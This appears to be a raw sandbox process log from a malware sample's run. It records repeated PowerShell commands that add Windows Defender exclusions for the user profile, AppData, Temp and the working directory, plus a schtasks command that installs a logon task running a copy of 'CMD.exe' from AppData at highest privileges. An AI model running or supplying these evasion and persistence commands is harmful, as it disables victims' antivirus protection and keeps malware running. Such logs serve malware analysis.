cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
596powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
2856powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2660powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2696cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CMD" /tr '"C:\Users\test22\AppData\Roaming\CMD.exe"' & exit
2656schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "CMD" /tr '"C:\Users\test22\AppData\Roaming\CMD.exe"'
1596cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
2452powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
2544powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2632cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
1068powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
1936cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CMD" /tr '"C:\Users\test22\AppData\Roaming\CMD.exe"' & exit
2244schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "CMD" /tr '"C:\Users\test22\AppData\Roaming\CMD.exe"'
2472